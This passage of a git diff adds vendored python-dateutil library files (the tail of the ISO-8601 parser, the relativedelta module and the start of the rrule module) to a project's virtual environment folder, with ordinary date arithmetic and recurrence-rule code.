``YYYYWww`` - ISO week (day defaults to 0) + - ``YYYY-Www-D`` or ``YYYYWwwD`` - ISO week and day + + The ISO week and day numbering follows the same logic as + :func:`datetime.date.isocalendar`. + + Supported time formats are: + + - ``hh`` + - ``hh:mm`` or ``hhmm`` + - ``hh:mm:ss`` or ``hhmmss`` + - ``hh:mm:ss.ssssss`` (Up to 6 sub-second digits) + + Midnight is a special case for `hh`, as the standard supports both + 00:00 and 24:00 as a representation. The decimal separator can be + either a dot or a comma. + + + .. caution:: + + Support for fractional components other than seconds is part of the + ISO-8601 standard, but is not currently implemented in this parser. + + Supported time zone offset formats are: + + - `Z` (UTC) + - `±HH:MM` + - `±HHMM` + - `±HH` + + Offsets will be represented as :class:`dateutil.tz.tzoffset` objects, + with the exception of UTC, which will be represented as + :class:`dateutil.tz.tzutc`. Time zone offsets equivalent to UTC (such + as `+00:00`) will also be represented as :class:`dateutil.tz.tzutc`. + + :param dt_str: + A string or stream containing only an ISO-8601 datetime string + + :return: + Returns a :class:`datetime.datetime` representing the string. + Unspecified components default to their lowest value. + + .. warning:: + + As of version 2.7.0, the strictness of the parser should not be + considered a stable part of the contract. Any valid ISO-8601 string + that parses correctly with the default settings will continue to + parse correctly in future versions, but invalid strings that + currently fail (e.g. ``2017-01-01T00:00+00:00:00``) are not + guaranteed to continue failing in future versions if they encode + a valid date. + + .. 
versionadded:: 2.7.0 + """ + components, pos = self._parse_isodate(dt_str) + + if len(dt_str) > pos: + if self._sep is None or dt_str[pos:pos + 1] == self._sep: + components += self._parse_isotime(dt_str[pos + 1:]) + else: + raise ValueError('String contains unknown ISO components') + + if len(components) > 3 and components[3] == 24: + components[3] = 0 + return datetime(*components) + timedelta(days=1) + + return datetime(*components) + + @_takes_ascii + def parse_isodate(self, datestr): + """ + Parse the date portion of an ISO string. + + :param datestr: + The string portion of an ISO string, without a separator + + :return: + Returns a :class:`datetime.date` object + """ + components, pos = self._parse_isodate(datestr) + if pos < len(datestr): + raise ValueError('String contains unknown ISO ' + + 'components: {!r}'.format(datestr.decode('ascii'))) + return date(*components) + + @_takes_ascii + def parse_isotime(self, timestr): + """ + Parse the time portion of an ISO string. + + :param timestr: + The time portion of an ISO string, without a separator + + :return: + Returns a :class:`datetime.time` object + """ + components = self._parse_isotime(timestr) + if components[0] == 24: + components[0] = 0 + return time(*components) + + @_takes_ascii + def parse_tzstr(self, tzstr, zero_as_utc=True): + """ + Parse a valid ISO time zone string. + + See :func:`isoparser.isoparse` for details on supported formats. + + :param tzstr: + A string representing an ISO time zone offset + + :param zero_as_utc: + Whether to return :class:`dateutil.tz.tzutc` for zero-offset zones + + :return: + Returns :class:`dateutil.tz.tzoffset` for offsets and + :class:`dateutil.tz.tzutc` for ``Z`` and (if ``zero_as_utc`` is + specified) offsets equivalent to UTC. + """ + return self._parse_tzstr(tzstr, zero_as_utc=zero_as_utc) + + # Constants + _DATE_SEP = b'-' + _TIME_SEP = b':' + _FRACTION_REGEX = re.compile(b'[\\.,]([0-9]+)') + + def _parse_isodate(self, dt_str): + try: + return self._parse_isodate_common(dt_str) + except ValueError: + return self._parse_isodate_uncommon(dt_str) + + def _parse_isodate_common(self, dt_str): + len_str = len(dt_str) + components = [1, 1, 1] + + if len_str < 4: + raise ValueError('ISO string too short') + + # Year + components[0] = int(dt_str[0:4]) + pos = 4 + if pos >= len_str: + return components, pos + + has_sep = dt_str[pos:pos + 1] == self._DATE_SEP + if has_sep: + pos += 1 + + # Month + if len_str - pos < 2: + raise ValueError('Invalid common month') + + components[1] = int(dt_str[pos:pos + 2]) + pos += 2 + + if pos >= len_str: + if has_sep: + return components, pos + else: + raise ValueError('Invalid ISO format') + + if has_sep: + if dt_str[pos:pos + 1] != self._DATE_SEP: + raise ValueError('Invalid separator in ISO string') + pos += 1 + + # Day + if len_str - pos < 2: + raise ValueError('Invalid common day') + components[2] = int(dt_str[pos:pos + 2]) + return components, pos + 2 + + def _parse_isodate_uncommon(self, dt_str): + if len(dt_str) < 4: + raise ValueError('ISO string too short') + + # All ISO formats start with the year + year = int(dt_str[0:4]) + + has_sep = dt_str[4:5] == self._DATE_SEP + + pos = 4 + has_sep # Skip '-' if it's there + if dt_str[pos:pos + 1] == b'W': + # YYYY-?Www-?D? 
+ pos += 1 + weekno = int(dt_str[pos:pos + 2]) + pos += 2 + + dayno = 1 + if len(dt_str) > pos: + if (dt_str[pos:pos + 1] == self._DATE_SEP) != has_sep: + raise ValueError('Inconsistent use of dash separator') + + pos += has_sep + + dayno = int(dt_str[pos:pos + 1]) + pos += 1 + + base_date = self._calculate_weekdate(year, weekno, dayno) + else: + # YYYYDDD or YYYY-DDD + if len(dt_str) - pos < 3: + raise ValueError('Invalid ordinal day') + + ordinal_day = int(dt_str[pos:pos + 3]) + pos += 3 + + if ordinal_day < 1 or ordinal_day > (365 + calendar.isleap(year)): + raise ValueError('Invalid ordinal day' + + ' {} for year {}'.format(ordinal_day, year)) + + base_date = date(year, 1, 1) + timedelta(days=ordinal_day - 1) + + components = [base_date.year, base_date.month, base_date.day] + return components, pos + + def _calculate_weekdate(self, year, week, day): + """ + Calculate the day of corresponding to the ISO year-week-day calendar. + + This function is effectively the inverse of + :func:`datetime.date.isocalendar`. + + :param year: + The year in the ISO calendar + + :param week: + The week in the ISO calendar - range is [1, 53] + + :param day: + The day in the ISO calendar - range is [1 (MON), 7 (SUN)] + + :return: + Returns a :class:`datetime.date` + """ + if not 0 < week < 54: + raise ValueError('Invalid week: {}'.format(week)) + + if not 0 < day < 8: # Range is 1-7 + raise ValueError('Invalid weekday: {}'.format(day)) + + # Get week 1 for the specific year: + jan_4 = date(year, 1, 4) # Week 1 always has January 4th in it + week_1 = jan_4 - timedelta(days=jan_4.isocalendar()[2] - 1) + + # Now add the specific number of weeks and days to get what we want + week_offset = (week - 1) * 7 + (day - 1) + return week_1 + timedelta(days=week_offset) + + def _parse_isotime(self, timestr): + len_str = len(timestr) + components = [0, 0, 0, 0, None] + pos = 0 + comp = -1 + + if len_str < 2: + raise ValueError('ISO time too short') + + has_sep = False + + while pos < len_str and comp < 5: + comp += 1 + + if timestr[pos:pos + 1] in b'-+Zz': + # Detect time zone boundary + components[-1] = self._parse_tzstr(timestr[pos:]) + pos = len_str + break + + if comp == 1 and timestr[pos:pos+1] == self._TIME_SEP: + has_sep = True + pos += 1 + elif comp == 2 and has_sep: + if timestr[pos:pos+1] != self._TIME_SEP: + raise ValueError('Inconsistent use of colon separator') + pos += 1 + + if comp < 3: + # Hour, minute, second + components[comp] = int(timestr[pos:pos + 2]) + pos += 2 + + if comp == 3: + # Fraction of a second + frac = self._FRACTION_REGEX.match(timestr[pos:]) + if not frac: + continue + + us_str = frac.group(1)[:6] # Truncate to microseconds + components[comp] = int(us_str) * 10**(6 - len(us_str)) + pos += len(frac.group()) + + if pos < len_str: + raise ValueError('Unused components in ISO string') + + if components[0] == 24: + # Standard supports 00:00 and 24:00 as representations of midnight + if any(component != 0 for component in components[1:4]): + raise ValueError('Hour may only be 24 at 24:00:00.000') + + return components + + def _parse_tzstr(self, tzstr, zero_as_utc=True): + if tzstr == b'Z' or tzstr == b'z': + return tz.UTC + + if len(tzstr) not in {3, 5, 6}: + raise ValueError('Time zone offset must be 1, 3, 5 or 6 characters') + + if tzstr[0:1] == b'-': + mult = -1 + elif tzstr[0:1] == b'+': + mult = 1 + else: + raise ValueError('Time zone offset requires sign') + + hours = int(tzstr[1:3]) + if len(tzstr) == 3: + minutes = 0 + else: + minutes = int(tzstr[(4 if tzstr[3:4] == self._TIME_SEP 
else 3):]) + + if zero_as_utc and hours == 0 and minutes == 0: + return tz.UTC + else: + if minutes > 59: + raise ValueError('Invalid minutes in time zone offset') + + if hours > 23: + raise ValueError('Invalid hours in time zone offset') + + return tz.tzoffset(None, mult * (hours * 60 + minutes) * 60) + + +DEFAULT_ISOPARSER = isoparser() +isoparse = DEFAULT_ISOPARSER.isoparse diff --git a/env/Lib/site-packages/dateutil/relativedelta.py b/env/Lib/site-packages/dateutil/relativedelta.py new file mode 100644 index 00000000..a9e85f7e --- /dev/null +++ b/env/Lib/site-packages/dateutil/relativedelta.py @@ -0,0 +1,599 @@ +# -*- coding: utf-8 -*- +import datetime +import calendar + +import operator +from math import copysign + +from six import integer_types +from warnings import warn + +from ._common import weekday + +MO, TU, WE, TH, FR, SA, SU = weekdays = tuple(weekday(x) for x in range(7)) + +__all__ = ["relativedelta", "MO", "TU", "WE", "TH", "FR", "SA", "SU"] + + +class relativedelta(object): + """ + The relativedelta type is designed to be applied to an existing datetime and + can replace specific components of that datetime, or represents an interval + of time. + + It is based on the specification of the excellent work done by M.-A. Lemburg + in his + `mx.DateTime `_ extension. + However, notice that this type does *NOT* implement the same algorithm as + his work. Do *NOT* expect it to behave like mx.DateTime's counterpart. + + There are two different ways to build a relativedelta instance. The + first one is passing it two date/datetime classes:: + + relativedelta(datetime1, datetime2) + + The second one is passing it any number of the following keyword arguments:: + + relativedelta(arg1=x,arg2=y,arg3=z...) + + year, month, day, hour, minute, second, microsecond: + Absolute information (argument is singular); adding or subtracting a + relativedelta with absolute information does not perform an arithmetic + operation, but rather REPLACES the corresponding value in the + original datetime with the value(s) in relativedelta. + + years, months, weeks, days, hours, minutes, seconds, microseconds: + Relative information, may be negative (argument is plural); adding + or subtracting a relativedelta with relative information performs + the corresponding arithmetic operation on the original datetime value + with the information in the relativedelta. + + weekday: + One of the weekday instances (MO, TU, etc) available in the + relativedelta module. These instances may receive a parameter N, + specifying the Nth weekday, which could be positive or negative + (like MO(+1) or MO(-2)). Not specifying it is the same as specifying + +1. You can also use an integer, where 0=MO. This argument is always + relative e.g. if the calculated date is already Monday, using MO(1) + or MO(-1) won't change the day. To effectively make it absolute, use + it in combination with the day argument (e.g. day=1, MO(1) for first + Monday of the month). + + leapdays: + Will add given days to the date found, if year is a leap + year, and the date found is post 28 of february. + + yearday, nlyearday: + Set the yearday or the non-leap year day (jump leap days). + These are converted to day/month/leapdays information. + + There are relative and absolute forms of the keyword + arguments. The plural is relative, and the singular is + absolute. For each argument in the order below, the absolute form + is applied first (by setting each attribute to that value) and + then the relative form (by adding the value to the attribute). 
+ + The order of attributes considered when this relativedelta is + added to a datetime is: + + 1. Year + 2. Month + 3. Day + 4. Hours + 5. Minutes + 6. Seconds + 7. Microseconds + + Finally, weekday is applied, using the rule described above. + + For example + + >>> from datetime import datetime + >>> from dateutil.relativedelta import relativedelta, MO + >>> dt = datetime(2018, 4, 9, 13, 37, 0) + >>> delta = relativedelta(hours=25, day=1, weekday=MO(1)) + >>> dt + delta + datetime.datetime(2018, 4, 2, 14, 37) + + First, the day is set to 1 (the first of the month), then 25 hours + are added, to get to the 2nd day and 14th hour, finally the + weekday is applied, but since the 2nd is already a Monday there is + no effect. + + """ + + def __init__(self, dt1=None, dt2=None, + years=0, months=0, days=0, leapdays=0, weeks=0, + hours=0, minutes=0, seconds=0, microseconds=0, + year=None, month=None, day=None, weekday=None, + yearday=None, nlyearday=None, + hour=None, minute=None, second=None, microsecond=None): + + if dt1 and dt2: + # datetime is a subclass of date. So both must be date + if not (isinstance(dt1, datetime.date) and + isinstance(dt2, datetime.date)): + raise TypeError("relativedelta only diffs datetime/date") + + # We allow two dates, or two datetimes, so we coerce them to be + # of the same type + if (isinstance(dt1, datetime.datetime) != + isinstance(dt2, datetime.datetime)): + if not isinstance(dt1, datetime.datetime): + dt1 = datetime.datetime.fromordinal(dt1.toordinal()) + elif not isinstance(dt2, datetime.datetime): + dt2 = datetime.datetime.fromordinal(dt2.toordinal()) + + self.years = 0 + self.months = 0 + self.days = 0 + self.leapdays = 0 + self.hours = 0 + self.minutes = 0 + self.seconds = 0 + self.microseconds = 0 + self.year = None + self.month = None + self.day = None + self.weekday = None + self.hour = None + self.minute = None + self.second = None + self.microsecond = None + self._has_time = 0 + + # Get year / month delta between the two + months = (dt1.year - dt2.year) * 12 + (dt1.month - dt2.month) + self._set_months(months) + + # Remove the year/month delta so the timedelta is just well-defined + # time units (seconds, days and microseconds) + dtm = self.__radd__(dt2) + + # If we've overshot our target, make an adjustment + if dt1 < dt2: + compare = operator.gt + increment = 1 + else: + compare = operator.lt + increment = -1 + + while compare(dt1, dtm): + months += increment + self._set_months(months) + dtm = self.__radd__(dt2) + + # Get the timedelta between the "months-adjusted" date and dt1 + delta = dt1 - dtm + self.seconds = delta.seconds + delta.days * 86400 + self.microseconds = delta.microseconds + else: + # Check for non-integer values in integer-only quantities + if any(x is not None and x != int(x) for x in (years, months)): + raise ValueError("Non-integer years and months are " + "ambiguous and not currently supported.") + + # Relative information + self.years = int(years) + self.months = int(months) + self.days = days + weeks * 7 + self.leapdays = leapdays + self.hours = hours + self.minutes = minutes + self.seconds = seconds + self.microseconds = microseconds + + # Absolute information + self.year = year + self.month = month + self.day = day + self.hour = hour + self.minute = minute + self.second = second + self.microsecond = microsecond + + if any(x is not None and int(x) != x + for x in (year, month, day, hour, + minute, second, microsecond)): + # For now we'll deprecate floats - later it'll be an error. 
+ warn("Non-integer value passed as absolute information. " + + "This is not a well-defined condition and will raise " + + "errors in future versions.", DeprecationWarning) + + if isinstance(weekday, integer_types): + self.weekday = weekdays[weekday] + else: + self.weekday = weekday + + yday = 0 + if nlyearday: + yday = nlyearday + elif yearday: + yday = yearday + if yearday > 59: + self.leapdays = -1 + if yday: + ydayidx = [31, 59, 90, 120, 151, 181, 212, + 243, 273, 304, 334, 366] + for idx, ydays in enumerate(ydayidx): + if yday <= ydays: + self.month = idx+1 + if idx == 0: + self.day = yday + else: + self.day = yday-ydayidx[idx-1] + break + else: + raise ValueError("invalid year day (%d)" % yday) + + self._fix() + + def _fix(self): + if abs(self.microseconds) > 999999: + s = _sign(self.microseconds) + div, mod = divmod(self.microseconds * s, 1000000) + self.microseconds = mod * s + self.seconds += div * s + if abs(self.seconds) > 59: + s = _sign(self.seconds) + div, mod = divmod(self.seconds * s, 60) + self.seconds = mod * s + self.minutes += div * s + if abs(self.minutes) > 59: + s = _sign(self.minutes) + div, mod = divmod(self.minutes * s, 60) + self.minutes = mod * s + self.hours += div * s + if abs(self.hours) > 23: + s = _sign(self.hours) + div, mod = divmod(self.hours * s, 24) + self.hours = mod * s + self.days += div * s + if abs(self.months) > 11: + s = _sign(self.months) + div, mod = divmod(self.months * s, 12) + self.months = mod * s + self.years += div * s + if (self.hours or self.minutes or self.seconds or self.microseconds + or self.hour is not None or self.minute is not None or + self.second is not None or self.microsecond is not None): + self._has_time = 1 + else: + self._has_time = 0 + + @property + def weeks(self): + return int(self.days / 7.0) + + @weeks.setter + def weeks(self, value): + self.days = self.days - (self.weeks * 7) + value * 7 + + def _set_months(self, months): + self.months = months + if abs(self.months) > 11: + s = _sign(self.months) + div, mod = divmod(self.months * s, 12) + self.months = mod * s + self.years = div * s + else: + self.years = 0 + + def normalized(self): + """ + Return a version of this object represented entirely using integer + values for the relative attributes. + + >>> relativedelta(days=1.5, hours=2).normalized() + relativedelta(days=+1, hours=+14) + + :return: + Returns a :class:`dateutil.relativedelta.relativedelta` object. 
+ """ + # Cascade remainders down (rounding each to roughly nearest microsecond) + days = int(self.days) + + hours_f = round(self.hours + 24 * (self.days - days), 11) + hours = int(hours_f) + + minutes_f = round(self.minutes + 60 * (hours_f - hours), 10) + minutes = int(minutes_f) + + seconds_f = round(self.seconds + 60 * (minutes_f - minutes), 8) + seconds = int(seconds_f) + + microseconds = round(self.microseconds + 1e6 * (seconds_f - seconds)) + + # Constructor carries overflow back up with call to _fix() + return self.__class__(years=self.years, months=self.months, + days=days, hours=hours, minutes=minutes, + seconds=seconds, microseconds=microseconds, + leapdays=self.leapdays, year=self.year, + month=self.month, day=self.day, + weekday=self.weekday, hour=self.hour, + minute=self.minute, second=self.second, + microsecond=self.microsecond) + + def __add__(self, other): + if isinstance(other, relativedelta): + return self.__class__(years=other.years + self.years, + months=other.months + self.months, + days=other.days + self.days, + hours=other.hours + self.hours, + minutes=other.minutes + self.minutes, + seconds=other.seconds + self.seconds, + microseconds=(other.microseconds + + self.microseconds), + leapdays=other.leapdays or self.leapdays, + year=(other.year if other.year is not None + else self.year), + month=(other.month if other.month is not None + else self.month), + day=(other.day if other.day is not None + else self.day), + weekday=(other.weekday if other.weekday is not None + else self.weekday), + hour=(other.hour if other.hour is not None + else self.hour), + minute=(other.minute if other.minute is not None + else self.minute), + second=(other.second if other.second is not None + else self.second), + microsecond=(other.microsecond if other.microsecond + is not None else + self.microsecond)) + if isinstance(other, datetime.timedelta): + return self.__class__(years=self.years, + months=self.months, + days=self.days + other.days, + hours=self.hours, + minutes=self.minutes, + seconds=self.seconds + other.seconds, + microseconds=self.microseconds + other.microseconds, + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + if not isinstance(other, datetime.date): + return NotImplemented + elif self._has_time and not isinstance(other, datetime.datetime): + other = datetime.datetime.fromordinal(other.toordinal()) + year = (self.year or other.year)+self.years + month = self.month or other.month + if self.months: + assert 1 <= abs(self.months) <= 12 + month += self.months + if month > 12: + year += 1 + month -= 12 + elif month < 1: + year -= 1 + month += 12 + day = min(calendar.monthrange(year, month)[1], + self.day or other.day) + repl = {"year": year, "month": month, "day": day} + for attr in ["hour", "minute", "second", "microsecond"]: + value = getattr(self, attr) + if value is not None: + repl[attr] = value + days = self.days + if self.leapdays and month > 2 and calendar.isleap(year): + days += self.leapdays + ret = (other.replace(**repl) + + datetime.timedelta(days=days, + hours=self.hours, + minutes=self.minutes, + seconds=self.seconds, + microseconds=self.microseconds)) + if self.weekday: + weekday, nth = self.weekday.weekday, self.weekday.n or 1 + jumpdays = (abs(nth) - 1) * 7 + if nth > 0: + jumpdays += (7 - ret.weekday() + weekday) % 7 + else: + jumpdays += (ret.weekday() - weekday) % 7 + jumpdays *= -1 + ret += 
datetime.timedelta(days=jumpdays) + return ret + + def __radd__(self, other): + return self.__add__(other) + + def __rsub__(self, other): + return self.__neg__().__radd__(other) + + def __sub__(self, other): + if not isinstance(other, relativedelta): + return NotImplemented # In case the other object defines __rsub__ + return self.__class__(years=self.years - other.years, + months=self.months - other.months, + days=self.days - other.days, + hours=self.hours - other.hours, + minutes=self.minutes - other.minutes, + seconds=self.seconds - other.seconds, + microseconds=self.microseconds - other.microseconds, + leapdays=self.leapdays or other.leapdays, + year=(self.year if self.year is not None + else other.year), + month=(self.month if self.month is not None else + other.month), + day=(self.day if self.day is not None else + other.day), + weekday=(self.weekday if self.weekday is not None else + other.weekday), + hour=(self.hour if self.hour is not None else + other.hour), + minute=(self.minute if self.minute is not None else + other.minute), + second=(self.second if self.second is not None else + other.second), + microsecond=(self.microsecond if self.microsecond + is not None else + other.microsecond)) + + def __abs__(self): + return self.__class__(years=abs(self.years), + months=abs(self.months), + days=abs(self.days), + hours=abs(self.hours), + minutes=abs(self.minutes), + seconds=abs(self.seconds), + microseconds=abs(self.microseconds), + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + def __neg__(self): + return self.__class__(years=-self.years, + months=-self.months, + days=-self.days, + hours=-self.hours, + minutes=-self.minutes, + seconds=-self.seconds, + microseconds=-self.microseconds, + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + def __bool__(self): + return not (not self.years and + not self.months and + not self.days and + not self.hours and + not self.minutes and + not self.seconds and + not self.microseconds and + not self.leapdays and + self.year is None and + self.month is None and + self.day is None and + self.weekday is None and + self.hour is None and + self.minute is None and + self.second is None and + self.microsecond is None) + # Compatibility with Python 2.x + __nonzero__ = __bool__ + + def __mul__(self, other): + try: + f = float(other) + except TypeError: + return NotImplemented + + return self.__class__(years=int(self.years * f), + months=int(self.months * f), + days=int(self.days * f), + hours=int(self.hours * f), + minutes=int(self.minutes * f), + seconds=int(self.seconds * f), + microseconds=int(self.microseconds * f), + leapdays=self.leapdays, + year=self.year, + month=self.month, + day=self.day, + weekday=self.weekday, + hour=self.hour, + minute=self.minute, + second=self.second, + microsecond=self.microsecond) + + __rmul__ = __mul__ + + def __eq__(self, other): + if not isinstance(other, relativedelta): + return NotImplemented + if self.weekday or other.weekday: + if not self.weekday or not other.weekday: + return False + if self.weekday.weekday != other.weekday.weekday: + return False + n1, n2 = self.weekday.n, other.weekday.n + if n1 != n2 and not ((not n1 or n1 == 1) and (not n2 or n2 == 1)): + return False + return (self.years == other.years and + 
self.months == other.months and + self.days == other.days and + self.hours == other.hours and + self.minutes == other.minutes and + self.seconds == other.seconds and + self.microseconds == other.microseconds and + self.leapdays == other.leapdays and + self.year == other.year and + self.month == other.month and + self.day == other.day and + self.hour == other.hour and + self.minute == other.minute and + self.second == other.second and + self.microsecond == other.microsecond) + + def __hash__(self): + return hash(( + self.weekday, + self.years, + self.months, + self.days, + self.hours, + self.minutes, + self.seconds, + self.microseconds, + self.leapdays, + self.year, + self.month, + self.day, + self.hour, + self.minute, + self.second, + self.microsecond, + )) + + def __ne__(self, other): + return not self.__eq__(other) + + def __div__(self, other): + try: + reciprocal = 1 / float(other) + except TypeError: + return NotImplemented + + return self.__mul__(reciprocal) + + __truediv__ = __div__ + + def __repr__(self): + l = [] + for attr in ["years", "months", "days", "leapdays", + "hours", "minutes", "seconds", "microseconds"]: + value = getattr(self, attr) + if value: + l.append("{attr}={value:+g}".format(attr=attr, value=value)) + for attr in ["year", "month", "day", "weekday", + "hour", "minute", "second", "microsecond"]: + value = getattr(self, attr) + if value is not None: + l.append("{attr}={value}".format(attr=attr, value=repr(value))) + return "{classname}({attrs})".format(classname=self.__class__.__name__, + attrs=", ".join(l)) + + +def _sign(x): + return int(copysign(1, x)) + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/rrule.py b/env/Lib/site-packages/dateutil/rrule.py new file mode 100644 index 00000000..b3203393 --- /dev/null +++ b/env/Lib/site-packages/dateutil/rrule.py @@ -0,0 +1,1737 @@ +# -*- coding: utf-8 -*- +""" +The rrule module offers a small, complete, and very fast, implementation of +the recurrence rules documented in the +`iCalendar RFC `_, +including support for caching of results. +""" +import calendar +import datetime +import heapq +import itertools +import re +import sys +from functools import wraps +# For warning about deprecation of until and count +from warnings import warn + +from six import advance_iterator, integer_types + +from six.moves import _thread, range + +from ._common import weekday as weekdaybase + +try: + from math import gcd +except ImportError: + from fractions import gcd + +__all__ = ["rrule", "rruleset", "rrulestr", + "YEARLY", "MONTHLY", "WEEKLY", "DAILY", + "HOURLY", "MINUTELY", "SECONDLY", + "MO", "TU", "WE", "TH", "FR", "SA", "SU"] + +# Every mask is 7 days longer to handle cross-year weekly periods. 
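+# M366MASK maps each day of a leap year (plus the 7-day spill-over) to its month number,
+# while MDAY366MASK/NMDAY366MASK map it to its day-of-month counted from the start/end of
+# the month; the 365-day variants below are derived by deleting the entry that exists only
+# in leap years.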
+M366MASK = tuple([1]*31+[2]*29+[3]*31+[4]*30+[5]*31+[6]*30 + + [7]*31+[8]*31+[9]*30+[10]*31+[11]*30+[12]*31+[1]*7) +M365MASK = list(M366MASK) +M29, M30, M31 = list(range(1, 30)), list(range(1, 31)), list(range(1, 32)) +MDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) +MDAY365MASK = list(MDAY366MASK) +M29, M30, M31 = list(range(-29, 0)), list(range(-30, 0)), list(range(-31, 0)) +NMDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) +NMDAY365MASK = list(NMDAY366MASK) +M366RANGE = (0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366) +M365RANGE = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365) +WDAYMASK = [0, 1, 2, 3, 4, 5, 6]*55 +del M29, M30, M31, M365MASK[59], MDAY365MASK[59], NMDAY365MASK[31] +MDAY365MASK = tuple(MDAY365MASK) +M365MASK = tuple(M365MASK) + +FREQNAMES = ['YEARLY', 'MONTHLY', 'WEEKLY', 'DAILY', 'HOURLY', 'MINUTELY', 'SECONDLY'] + +(YEARLY, + MONTHLY, + WEEKLY, + DAILY, + HOURLY, + MINUTELY, + SECONDLY) = list(range(7)) + +# Imported on demand. +easter = None +parser = None + + +class weekday(weekdaybase): + """ + This version of weekday does not allow n = 0. + """ + def __init__(self, wkday, n=None): + if n == 0: + raise ValueError("Can't create weekday with n==0") + + super(weekday, self).__init__(wkday, n) + + +MO, TU, WE, TH, FR, SA, SU = weekdays = tuple(weekday(x) for x in range(7)) + + +def _invalidates_cache(f): + """ + Decorator for rruleset methods which may invalidate the + cached length. + """ + @wraps(f) + def inner_func(self, *args, **kwargs): + rv = f(self, *args, **kwargs) + self._invalidate_cache() + return rv + + return inner_func + + +class rrulebase(object): + def __init__(self, cache=False): + if cache: + self._cache = [] + self._cache_lock = _thread.allocate_lock() + self._invalidate_cache() + else: + self._cache = None + self._cache_complete = False + self._len = None + + def __iter__(self): + if self._cache_complete: + return iter(self._cache) + elif self._cache is None: + return self._iter() + else: + return self._iter_cached() + + def _invalidate_cache(self): + if self._cache is not None: + self._cache = [] + self._cache_complete = False + self._cache_gen = self._iter() + + if self._cache_lock.locked(): + self._cache_lock.release() + + self._len = None + + def _iter_cached(self): + i = 0 + gen = self._cache_gen + cache = self._cache + acquire = self._cache_lock.acquire + release = self._cache_lock.release + while gen: + if i == len(cache): + acquire() + if self._cache_complete: + break + try: + for j in range(10): + cache.append(advance_iterator(gen)) + except StopIteration: + self._cache_gen = gen = None + self._cache_complete = True + break + release() + yield cache[i] + i += 1 + while i < self._len: + yield cache[i] + i += 1 + + def __getitem__(self, item): + if self._cache_complete: + return self._cache[item] + elif isinstance(item, slice): + if item.step and item.step < 0: + return list(iter(self))[item] + else: + return list(itertools.islice(self, + item.start or 0, + item.stop or sys.maxsize, + item.step or 1)) + elif item >= 0: + gen = iter(self) + try: + for i in range(item+1): + res = advance_iterator(gen) + except StopIteration: + raise IndexError + return res + else: + return list(iter(self))[item] + + def __contains__(self, item): + if self._cache_complete: + return item in self._cache + else: + for i in self: + if i == item: + return True + elif i > item: + return False + return False + + # __len__() introduces a large performance penalty. 
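+ # count() below is used instead; it walks the full recurrence once and caches the
+ # resulting length in self._len.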
+ def count(self): + """ Returns the number of recurrences in this set. It will have go + trough the whole recurrence, if this hasn't been done before. """ + if self._len is None: + for x in self: + pass + return self._len + + def before(self, dt, inc=False): + """ Returns the last recurrence before the given datetime instance. The + inc keyword defines what happens if dt is an occurrence. With + inc=True, if dt itself is an occurrence, it will be returned. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + last = None + if inc: + for i in gen: + if i > dt: + break + last = i + else: + for i in gen: + if i >= dt: + break + last = i + return last + + def after(self, dt, inc=False): + """ Returns the first recurrence after the given datetime instance. The + inc keyword defines what happens if dt is an occurrence. With + inc=True, if dt itself is an occurrence, it will be returned. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + if inc: + for i in gen: + if i >= dt: + return i + else: + for i in gen: + if i > dt: + return i + return None + + def xafter(self, dt, count=None, inc=False): + """ + Generator which yields up to `count` recurrences after the given + datetime instance, equivalent to `after`. + + :param dt: + The datetime at which to start generating recurrences. + + :param count: + The maximum number of recurrences to generate. If `None` (default), + dates are generated until the recurrence rule is exhausted. + + :param inc: + If `dt` is an instance of the rule and `inc` is `True`, it is + included in the output. + + :yields: Yields a sequence of `datetime` objects. + """ + + if self._cache_complete: + gen = self._cache + else: + gen = self + + # Select the comparison function + if inc: + comp = lambda dc, dtc: dc >= dtc + else: + comp = lambda dc, dtc: dc > dtc + + # Generate dates + n = 0 + for d in gen: + if comp(d, dt): + if count is not None: + n += 1 + if n > count: + break + + yield d + + def between(self, after, before, inc=False, count=1): + """ Returns all the occurrences of the rrule between after and before. + The inc keyword defines what happens if after and/or before are + themselves occurrences. With inc=True, they will be included in the + list, if they are found in the recurrence set. """ + if self._cache_complete: + gen = self._cache + else: + gen = self + started = False + l = [] + if inc: + for i in gen: + if i > before: + break + elif not started: + if i >= after: + started = True + l.append(i) + else: + l.append(i) + else: + for i in gen: + if i >= before: + break + elif not started: + if i > after: + started = True + l.append(i) + else: + l.append(i) + return l + + +class rrule(rrulebase): + """ + That's the base of the rrule operation. It accepts all the keywords + defined in the RFC as its constructor parameters (except byday, + which was renamed to byweekday) and more. The constructor prototype is:: + + rrule(freq) + + Where freq must be one of YEARLY, MONTHLY, WEEKLY, DAILY, HOURLY, MINUTELY, + or SECONDLY. + + .. note:: + Per RFC section 3.3.10, recurrence instances falling on invalid dates + and times are ignored rather than coerced: + + Recurrence rules may generate recurrence instances with an invalid + date (e.g., February 30) or nonexistent local time (e.g., 1:30 AM + on a day where the local time is moved forward by an hour at 1:00 + AM). Such recurrence instances MUST be ignored and MUST NOT be + counted as part of the recurrence set. 
